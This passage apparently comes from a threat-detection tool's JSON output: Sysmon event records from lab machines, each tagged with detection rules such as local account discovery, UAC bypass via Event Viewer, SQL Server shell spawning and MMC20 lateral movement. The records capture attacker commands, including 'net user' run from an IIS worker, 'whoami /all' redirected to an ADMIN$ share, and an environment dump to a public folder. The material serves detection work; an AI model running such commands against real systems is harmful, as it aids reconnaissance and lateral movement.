(win7sp1_rtm.101119-1850)","Hashes":"SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-45C7-5CE7-0000-002092F99C00","LogonId":"0x9cf992","ParentCommandLine":"c:\\windows\\system32\\inetsrv\\w3wp.exe -ap \"DefaultAppPool\" -v \"v2.0\" -l \"webengine4.dll\" -a \\\\.\\pipe\\iisipm719e5ea8-b97b-40d0-96b6-44cca91790fe -h \"C:\\inetpub\\temp\\apppools\\DefaultAppPool\\DefaultAppPool.config\" -w \"\" -m 0 -t 20","ParentImage":"C:\\Windows\\System32\\inetsrv\\w3wp.exe","ParentProcessGuid":"365ABB72-49D6-5CE7-0000-001020A7A700","ParentProcessId":2580,"ProcessGuid":"365ABB72-4A01-5CE7-0000-0010EE9DAC00","ProcessId":2404,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"IIS APPPOOL\\DefaultAppPool","UtcTime":"2019-05-24 01:33:53.112"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":1044,"Execution_attributes":{"ProcessID":2032,"ThreadID":2092},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-05-24T01:33:53.112486Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Net.exe Execution","Local Accounts Discovery"],"event":{"Event":{"EventData":{"CommandLine":"net user","Company":"Microsoft Corporation","CurrentDirectory":"c:\\windows\\system32\\inetsrv\\","Description":"Net Command","FileVersion":"6.1.7600.16385 
(win7_rtm.090713-1255)","Hashes":"SHA1=9A544E2094273741AA2D3E7EA0AF303AF2B587EA,MD5=B9A4DAC2192FD78CDA097BFA79F6E7B2,SHA256=D468E6B1B79555AC8BCE0300942FD479689EB8F159F3A399848D3BF9B9990A56,IMPHASH=B1F584304D1C7F2899A954905D8318C7","Image":"C:\\Windows\\System32\\net.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-45C7-5CE7-0000-002092F99C00","LogonId":"0x9cf992","ParentCommandLine":"\"c:\\windows\\system32\\cmd.exe\" /c net user","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"365ABB72-4A01-5CE7-0000-0010EE9DAC00","ParentProcessId":2404,"ProcessGuid":"365ABB72-4A01-5CE7-0000-00102DA1AC00","ProcessId":788,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"IIS APPPOOL\\DefaultAppPool","UtcTime":"2019-05-24 01:33:53.152"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":1046,"Execution_attributes":{"ProcessID":2032,"ThreadID":2092},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-05-24T01:33:53.182587Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Net.exe Execution","Local Accounts Discovery"],"event":{"Event":{"EventData":{"CommandLine":"C:\\Windows\\system32\\net1 user","Company":"Microsoft Corporation","CurrentDirectory":"c:\\windows\\system32\\inetsrv\\","Description":"Net Command","FileVersion":"6.1.7601.17514 
(win7sp1_rtm.101119-1850)","Hashes":"SHA1=387577C0B3B89FEFCE983DC42CFF456A33287035,MD5=2041012726EF7C95ED51C15C56545A7F,SHA256=A0BE13AC9443ACC6D2EEA474CC82A727BDB7E1009F573DBA34D269F9A6AAA347,IMPHASH=FB687F4F7ACC1F20B5382A2C932A259E","Image":"C:\\Windows\\System32\\net1.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-45C7-5CE7-0000-002092F99C00","LogonId":"0x9cf992","ParentCommandLine":"net user","ParentImage":"C:\\Windows\\System32\\net.exe","ParentProcessGuid":"365ABB72-4A01-5CE7-0000-00102DA1AC00","ParentProcessId":788,"ProcessGuid":"365ABB72-4A01-5CE7-0000-0010B6A2AC00","ProcessId":712,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"IIS APPPOOL\\DefaultAppPool","UtcTime":"2019-05-24 01:33:53.162"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":1047,"Execution_attributes":{"ProcessID":2032,"ThreadID":2092},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-05-24T01:33:53.192601Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"c:\\windows\\system32\\notepad.exe\\1","EventType":"SetValue","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"747F3D96-86FC-5F07-0000-00101E4B0700","ProcessId":2356,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU\\a","UtcTime":"2020-07-09 
22:00:17.579"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":311354,"Execution_attributes":{"ProcessID":3280,"ThreadID":1044},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-07-09T22:00:17.591137Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"a","EventType":"SetValue","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"747F3D96-86FC-5F07-0000-00101E4B0700","ProcessId":2356,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU\\MRUList","UtcTime":"2020-07-09 22:00:17.579"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":311355,"Execution_attributes":{"ProcessID":3280,"ThreadID":1044},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-07-09T22:00:17.591169Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event 
Viewer"],"event":{"Event":{"EventData":{"Details":"a","EventType":"SetValue","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"747F3D96-86FC-5F07-0000-00101E4B0700","ProcessId":2356,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU\\MRUList","UtcTime":"2020-07-09 22:00:31.172"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":311361,"Execution_attributes":{"ProcessID":3280,"ThreadID":1044},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-07-09T22:00:31.218022Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"cmd.exe\\1","EventType":"SetValue","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"747F3D96-86FC-5F07-0000-00101E4B0700","ProcessId":2356,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU\\b","UtcTime":"2020-07-09 
22:00:45.579"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":311367,"Execution_attributes":{"ProcessID":3280,"ThreadID":1044},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-07-09T22:00:45.590589Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"ba","EventType":"SetValue","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"747F3D96-86FC-5F07-0000-00101E4B0700","ProcessId":2356,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU\\MRUList","UtcTime":"2020-07-09 22:00:45.579"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":311368,"Execution_attributes":{"ProcessID":3280,"ThreadID":1044},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-07-09T22:00:45.590736Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event 
Viewer"],"event":{"Event":{"EventData":{"Details":"powershell.exe\\1","EventType":"SetValue","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"747F3D96-86FC-5F07-0000-00101E4B0700","ProcessId":2356,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU\\c","UtcTime":"2020-07-09 22:01:03.893"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":311375,"Execution_attributes":{"ProcessID":3280,"ThreadID":1044},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-07-09T22:01:03.900433Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"cba","EventType":"SetValue","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"747F3D96-86FC-5F07-0000-00101E4B0700","ProcessId":2356,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU\\MRUList","UtcTime":"2020-07-09 
22:01:03.893"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":311376,"Execution_attributes":{"ProcessID":3280,"ThreadID":1044},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-07-09T22:01:03.902259Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"eventvwr\\1","EventType":"SetValue","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"747F3D96-94CF-5F07-0000-0010BD590400","ProcessId":3248,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU\\d","UtcTime":"2020-07-09 22:06:20.180"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":311387,"Execution_attributes":{"ProcessID":3148,"ThreadID":4088},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-07-09T22:06:20.185045Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event 
Viewer"],"event":{"Event":{"EventData":{"Details":"dcba","EventType":"SetValue","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"747F3D96-94CF-5F07-0000-0010BD590400","ProcessId":3248,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU\\MRUList","UtcTime":"2020-07-09 22:06:20.180"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":311388,"Execution_attributes":{"ProcessID":3148,"ThreadID":4088},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-07-09T22:06:20.185107Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"\\\\tsclient\\c\\temp\\stack\\a.exe\\1","EventType":"SetValue","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"747F3D96-94CF-5F07-0000-0010BD590400","ProcessId":3248,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU\\e","UtcTime":"2020-07-10 
10:20:37.668"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":311413,"Execution_attributes":{"ProcessID":3148,"ThreadID":4088},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-07-10T10:20:37.672486Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"edcba","EventType":"SetValue","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"747F3D96-94CF-5F07-0000-0010BD590400","ProcessId":3248,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU\\MRUList","UtcTime":"2020-07-10 10:20:37.668"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":311414,"Execution_attributes":{"ProcessID":3148,"ThreadID":4088},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-07-10T10:20:37.672499Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Shells Spawn by SQL Server"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c set > c:\\users\\\\public\\netstat.txt","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 
(WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-CE3B-5DBE-0000-00201ED50100","LogonId":"0x1d51e","ParentCommandLine":"\"c:\\Program Files\\Microsoft SQL Server\\MSSQL10.SQLEXPRESS\\MSSQL\\Binn\\sqlservr.exe\" -sSQLEXPRESS","ParentImage":"C:\\Program Files\\Microsoft SQL Server\\MSSQL10.SQLEXPRESS\\MSSQL\\Binn\\sqlservr.exe","ParentProcessGuid":"747F3D96-CE42-5DBE-0000-0010EE430200","ParentProcessId":3936,"ProcessGuid":"747F3D96-DB7C-5DBE-0000-0010CF6B9502","ProcessId":5004,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"MSEDGEWIN10\\sqlsvc","UtcTime":"2019-11-03 13:51:56.380"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":56509,"Execution_attributes":{"ProcessID":3180,"ThreadID":4224},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-11-03T13:51:58.263043Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["MMC20 Lateral Movement"],"event":{"Event":{"EventData":{"CommandLine":"C:\\Windows\\system32\\mmc.exe -Embedding","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Microsoft Management Console","FileVersion":"6.1.7600.16385 
(win7_rtm.090713-1255)","Hashes":"SHA1=98D8C5E38510C6220F42747D15F6FFF75DD59845,MD5=A2A5D487D0C3D55739A0491B6872480D,SHA256=40E2B83F07771D54CE4E45B76A14883D042766FF4E1E7872E482EC91E81E9484,IMPHASH=6D2ED4ADDAC7EBAE62381320D82AC4C1","Image":"C:\\Windows\\System32\\mmc.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-B17F-5CC8-0000-0020C6A31E00","LogonId":"0x1ea3c6","ParentCommandLine":"C:\\Windows\\system32\\svchost.exe -k DcomLaunch","ParentImage":"C:\\Windows\\System32\\svchost.exe","ParentProcessGuid":"365ABB72-2586-5CC9-0000-001087700000","ParentProcessId":612,"ProcessGuid":"365ABB72-B17F-5CC8-0000-001082A51E00","ProcessId":3572,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"IEWIN7\\IEUser","UtcTime":"2019-04-30 20:35:11.856"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":9832,"Execution_attributes":{"ProcessID":1964,"ThreadID":1664},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-04-30T20:35:11.856089Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["MMC Spawning Windows Shell"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\System32\\cmd.exe\" /Q /c cd \\ 1> \\\\127.0.0.1\\ADMIN$\\__1556656511.61 2>&1","Company":"Microsoft Corporation","CurrentDirectory":"C:\\windows\\system32\\","Description":"Windows Command Processor","FileVersion":"6.1.7601.17514 
(win7sp1_rtm.101119-1850)","Hashes":"SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-B17F-5CC8-0000-0020C6A31E00","LogonId":"0x1ea3c6","ParentCommandLine":"C:\\Windows\\system32\\mmc.exe -Embedding","ParentImage":"C:\\Windows\\System32\\mmc.exe","ParentProcessGuid":"365ABB72-B17F-5CC8-0000-001082A51E00","ParentProcessId":3572,"ProcessGuid":"365ABB72-B180-5CC8-0000-00102BB71E00","ProcessId":1504,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"IEWIN7\\IEUser","UtcTime":"2019-04-30 20:35:12.340"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":9833,"Execution_attributes":{"ProcessID":1964,"ThreadID":1664},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-04-30T20:35:12.449839Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["MMC Spawning Windows Shell"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\System32\\cmd.exe\" /Q /c cd 1> \\\\127.0.0.1\\ADMIN$\\__1556656511.61 2>&1","Company":"Microsoft Corporation","CurrentDirectory":"C:\\","Description":"Windows Command Processor","FileVersion":"6.1.7601.17514 
(win7sp1_rtm.101119-1850)","Hashes":"SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-B17F-5CC8-0000-0020C6A31E00","LogonId":"0x1ea3c6","ParentCommandLine":"C:\\Windows\\system32\\mmc.exe -Embedding","ParentImage":"C:\\Windows\\System32\\mmc.exe","ParentProcessGuid":"365ABB72-B17F-5CC8-0000-001082A51E00","ParentProcessId":3572,"ProcessGuid":"365ABB72-B181-5CC8-0000-0010ADBF1E00","ProcessId":3372,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"IEWIN7\\IEUser","UtcTime":"2019-04-30 20:35:13.434"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":9838,"Execution_attributes":{"ProcessID":1964,"ThreadID":1664},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-04-30T20:35:13.449839Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["MMC Spawning Windows Shell","Whoami Execution Anomaly"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\System32\\cmd.exe\" /Q /c whoami /all 1> \\\\127.0.0.1\\ADMIN$\\__1556656511.61 2>&1","Company":"Microsoft Corporation","CurrentDirectory":"C:\\","Description":"Windows Command Processor","FileVersion":"6.1.7601.17514 
(win7sp1_rtm.101119-1850)","Hashes":"SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-B17F-5CC8-0000-0020C6A31E00","LogonId":"0x1ea3c6","ParentCommandLine":"C:\\Windows\\system32\\mmc.exe -Embedding","ParentImage":"C:\\Windows\\System32\\mmc.exe","ParentProcessGuid":"365ABB72-B17F-5CC8-0000-001082A51E00","ParentProcessId":3572,"ProcessGuid":"365ABB72-B181-5CC8-0000-001023C41E00","ProcessId":1256,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"IEWIN7\\IEUser","UtcTime":"2019-04-30 20:35:13.512"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":9839,"Execution_attributes":{"ProcessID":1964,"ThreadID":1664},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-04-30T20:35:13.512339Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Whoami Execution","Local Accounts Discovery"],"event":{"Event":{"EventData":{"CommandLine":"whoami /all ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\","Description":"whoami - displays logged on user information","FileVersion":"6.1.7600.16385 
(win7_rtm.090713-1255)","Hashes":"SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274","Image":"C:\\Windows\\System32\\whoami.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-B17F-5CC8-0000-0020C6A31E00","LogonId":"0x1ea3c6","ParentCommandLine":"\"C:\\Windows\\System32\\cmd.exe\" /Q /c whoami /all 1> \\\\127.0.0.1\\ADMIN$\\__1556656511.61 2>&1","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"365ABB72-B181-5CC8-0000-001023C41E00","ParentProcessId":1256,"ProcessGuid":"365ABB72-B181-5CC8-0000-00108DC71E00","ProcessId":692,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"IEWIN7\\IEUser","UtcTime":"2019-04-30 20:35:13.527"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":9840,"Execution_attributes":{"ProcessID":1964,"ThreadID":1664},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-04-30T20:35:13.543589Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["(Built-in Logic) - Security audit log was 
